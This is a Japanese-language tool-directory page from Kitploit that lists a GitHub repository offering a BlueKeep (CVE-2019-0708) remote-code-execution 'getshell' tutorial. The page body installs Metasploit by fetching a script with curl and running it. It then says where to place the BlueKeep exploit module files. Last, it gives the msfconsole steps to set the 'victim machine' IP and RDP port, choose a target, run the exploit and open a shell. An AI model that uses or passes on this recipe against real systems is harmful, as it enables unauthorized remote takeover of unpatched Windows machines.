Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0708-RCE — CVE-2019-0708 RCEリモートコード実行getshellチュートリアル | Kitploit
ツール/GitHubGitHub/0x6b7966/cve-2019-0708-rce
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHub0x6b7966/cve-2019-0708-rce

CVE-2019-0708-RCE

CVE-2019-0708 RCEリモートコード実行getshellチュートリアル

リポジトリを見る
11147年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-0708-RCE

kali にインストール/更新 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall

攻撃キットをダウンロードし、ファイルをmsfの該当フォルダに配置します(同名ファイルが既に存在する場合は直接上書きしてください)

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

利用手順:

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set RHOSTS を使用して被害機のIPを設定

set RPORT を使用して被害機のRDPポート番号を設定

set target ID番号(0〜4から選択可能)を使用して被害機のアーキテクチャを設定

set target=3

exploit

shell

image

ツールをダウンロード